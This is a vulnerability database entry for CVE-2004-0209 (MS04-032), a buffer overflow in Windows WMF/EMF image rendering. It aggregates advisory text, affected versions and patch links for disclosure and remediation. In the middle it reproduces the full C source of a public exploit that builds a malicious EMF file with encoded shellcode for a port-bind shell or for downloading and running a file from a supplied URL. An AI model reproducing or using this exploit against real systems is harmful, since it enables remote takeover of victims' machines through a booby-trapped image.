CVE-2004-0209
CVSS 10.0
Published: 2004-11-03 00:00:00
Revised: 2016-10-17 22:41:53

[Original] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."


[CNNVD] Microsoft Windows Graphics Rendering Engine Security Vulnerability (MS04-032) (CNNVD-200411-005)

        
        Microsoft Windows is an operating system developed by Microsoft.
        Microsoft Windows has a flaw in its handling of the Windows Metafile (WMF) and Enhanced Metafile (EMF) image formats; a remote attacker can exploit this vulnerability to execute arbitrary code on the system with the privileges of the rendering process.
        An attacker who crafts a malicious WMF or EMF image file and entices a user to process it can execute arbitrary code with the privileges of the application process that renders the WMF or EMF image. No detailed vulnerability information is currently available.
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_xp::gold  Microsoft Windows XP Gold

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:2428  Windows XP/Server 2003 (64-Bit) Enhanced Metafile Image Format Rendering Buffer Overflow
oval:org.mitre.oval:def:2114  Windows 2000 Enhanced Metafile Image Format Rendering Buffer Overflow
oval:org.mitre.oval:def:1872  Windows XP Enhanced Metafile Image Format Rendering Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; more technical detection details can be found in the related OVAL definitions.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0209
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0209
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-005
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=109829067325779&w=2
(UNKNOWN)  BUGTRAQ  20041019 [EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
http://www.kb.cert.org/vuls/id/806278
(UNKNOWN)  CERT-VN  VU#806278
http://www.microsoft.com/technet/security/bulletin/ms04-032.asp
(VENDOR_ADVISORY)  MS  MS04-032
http://www.securityfocus.com/bid/11375
(UNKNOWN)  BID  11375
http://xforce.iss.net/xforce/xfdb/16581
(VENDOR_ADVISORY)  XF  win-emf-bo(16581)
http://xforce.iss.net/xforce/xfdb/17658
(UNKNOWN)  XF  win-ms04032-patch(17658)

- Vulnerability Information

Microsoft Windows Graphics Rendering Engine Security Vulnerability (MS04-032)
Critical  Boundary Condition Error
2004-11-03 00:00:00 2005-10-20 00:00:00
Remote  
        

- Advisories and Patches

        Vendor patches:
        Microsoft
        ---------
        Microsoft has released security bulletin MS04-032 and the corresponding patches for this issue:
        MS04-032: Security Update for Microsoft Windows (840987)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS04-032.mspx

        Patch downloads:
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=533AE5CD-74CE-470A-8916-8E358084497C

        Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=3B871A96-5F64-4432-920F-FA5760DF683A

        Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=4A614222-BA0B-4927-856D-D443BBBE1A42

        
        Microsoft Windows XP and Microsoft Windows XP Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=715E985B-7929-4BD5-9564-5CFE7D528398

        
        Microsoft Windows XP 64-Bit Edition Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=99184841-70A8-47C7-9993-44A60E999A40

        
        Microsoft Windows XP 64-Bit Edition Version 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B4E6BBCF-F5B9-4B2D-8BC4-30911CA4FD9C

        
        Microsoft Windows Server 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=206E9842-997D-45E4-9252-61F3CE5EA66C

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B4E6BBCF-F5B9-4B2D-8BC4-30911CA4FD9C

- Vulnerability Information (584)

MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) (EDBID:584)
windows remote
2004-10-20 Verified
0 houseofdabus
N/A [Download]
/* HOD-ms04032-emf-expl2.c: 
 * 
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow 
 * 
 * Exploit version 0.2 (PUBLIC) coded by 
 * 
 * 
 *                 .::[ houseofdabus ]::. 
 * 
 * 
 * [at inbox dot ru] 
 * ------------------------------------------------------------------- 
 * About WMF/EMF: 
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats 
 * are vector files that can contain a raster image... 
 * 
 * ------------------------------------------------------------------- 
 * The vulnerability will be triggered by either viewing a malicious 
 * file or by navigating to a directory, which contains a malicious 
 * file and displays it as a thumbnail. 
 * 
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209 
 * ------------------------------------------------------------------- 
 * Tested on: 
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe) 
 *    - Explorer (explorer.exe) 
 *    - Windows XP SP1 
 * 
 * ------------------------------------------------------------------- 
 * Compile: 
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c 
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib 
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c 
 * 
 * ------------------------------------------------------------------- 
 * Command Line Parameters/Arguments: 
 * 
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] 
 * 
 *   Shellcode: 
 *        1 - Portbind shellcode 
 *        2 - Connectback shellcode 
 * 
 * ------------------------------------------------------------------- 
 * Examples: 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe 
 * 
 * ------------------------------------------------------------------- 
 * 
 *   This is provided as proof-of-concept code only for educational 
 *   purposes and testing by authorized individuals with permission to 
 *   do so. 
 * 
 */ 
 
 
/* #define _WIN32 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
 
#ifdef _WIN32 
#pragma comment(lib,"ws2_32") 
#include <winsock2.h> 
 
#else 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#endif 
 
#include <windows.h> 
 
 
unsigned char emfheader[] =  
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00" 
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00" 
 
"\xEB\x12\x90\x90\x90\x90\x90\x90" 
"\x9e\x5c\x05\x78"	/* call [edi+0x74h] - rpcrt4.dll */ 
"\xb4\x73\xed\x77";	/* Top SEH          - XP SP1 */ 
 
 
unsigned char portbind_sc[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff" 
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88" 
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4" 
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9" 
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7" 
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60" 
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60" 
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60" 
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60" 
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60" 
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60" 
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60" 
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60" 
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60" 
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc" 
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8" 
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e" 
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77" 
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b" 
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e" 
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4" 
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1" 
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77" 
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde" 
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80" 
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03" 
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1" 
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49" 
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b" 
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63" 
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88"; 
 
 
unsigned char download_sc[]= 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" 
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" 
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" 
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" 
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" 
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" 
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" 
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" 
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" 
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" 
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" 
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" 
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" 
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" 
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" 
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" 
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" 
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" 
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" 
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" 
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" 
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" 
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" 
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" 
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" 
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" 
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" 
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" 
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" 
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" 
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" 
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" 
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" 
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" 
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" 
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" 
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" 
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" 
"\x27\x39\x72\x6F\x72\x17""HOD""\x21"; 
 
unsigned char endoffile[] = "\x00\x00\x00\x00"; 
 
 
void 
usage(char *prog) 
{ 
	printf("Usage:\n"); 
	printf("%s <file> <shellcode> <bindport / url>\n", prog); 
	printf("\nShellcode:\n"); 
	printf("      1 - Portbind shellcode\n"); 
	printf("      2 - Download & exec shellcode\n\n"); 
	exit(0); 
} 
 
 
int 
main(int argc, char **argv) 
{ 
	char endofurl = '\x01'; 
	unsigned short port; 
	int sc; 
	FILE *fp; 
 
	printf("\n(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow\n\n"); 
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); 
 
	if (argc < 4) usage(argv[0]); 
 
	sc = atoi(argv[2]); 
	if ((sc > 2) || (sc < 1)) usage(argv[0]); 
 
	fp = fopen(argv[1], "wb"); 
	if (fp == NULL) { 
		printf("[-] error: can\'t create file: %s\n", argv[1]); 
		exit(0); 
	} 
 
	/* header */ 
	fwrite(emfheader, 1, sizeof(emfheader)-1, fp); 
 
	printf("[*] Shellcode: "); 
	if (sc == 1) { 
		port = atoi(argv[3]); 
		printf("Portbind, port = %u\n", port); 
		port = htons(port^(unsigned short)0x8888); 
		memcpy(portbind_sc+266, &port, 2); 
		fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp); 
		fwrite(endoffile, 1, 4, fp); 
	} 
	else { 
		printf("Download & exec, url = %s\n", argv[3]); 
		fwrite(download_sc, 1, sizeof(download_sc)-1, fp); 
		fwrite(argv[3], 1, strlen(argv[3]), fp); 
		fwrite(&endofurl, 1, 1, fp); 
		fwrite(endoffile, 1, 4, fp); 
	} 
 
	printf("[+] Ok\n"); 
	fclose(fp); 
 
return 0; 
} 

// milw0rm.com [2004-10-20]
		

- Vulnerability Information (F34676)

HOD-ms04032-emf-expl2.c (PacketStormID:F34676)
2004-10-19 00:00:00
houseofdabus  
exploit
CVE-2004-0209
[Download]

Exploit that creates crafted metadata files to exploit IE6.0 display of such, as well as Explorer.exe's display of thumbnails of such. Created by houseofdabus. Exploit will connect back to set host/port.

- Vulnerability Information

10692
Microsoft Windows Metafile Image Format Arbitrary Code Execution
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- Vulnerability Description

A local overflow exists in Windows. The Graphics Rendering Engine fails to validate Windows Metafile (WMF) and Enhanced Metafile (EMF) image files resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-10-12 Unknown
2004-10-19 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability Author

- Vulnerability Information

Microsoft Windows WMF/EMF Image Format Rendering Remote Buffer Overflow Vulnerability
Boundary Condition Error 11375
Yes No
2004-10-12 12:00:00 2008-12-10 11:51:00
Discovery of this issue is credited to Patrick Porlan <porlan@club-internet.fr> and Mark Russinovich of Winternals Software.

- Affected Versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers
Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

- Unaffected Versions

Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

- Vulnerability Discussion

Microsoft Windows WMF/EMF image-rendering library is affected by a remote buffer-overflow vulnerability because it fails to properly verify the lengths of strings contained within an affected image file before copying them into finite buffers.

Any code execution that occurs will take place with SYSTEM privileges because of the nature of the affected library. This will also permit local privilege-escalation attacks.

- Exploit

The following exploit has been made available:

- Solution

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.


Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Home

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows 2000 Server SP4

Microsoft Windows XP Professional

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- References

 

 
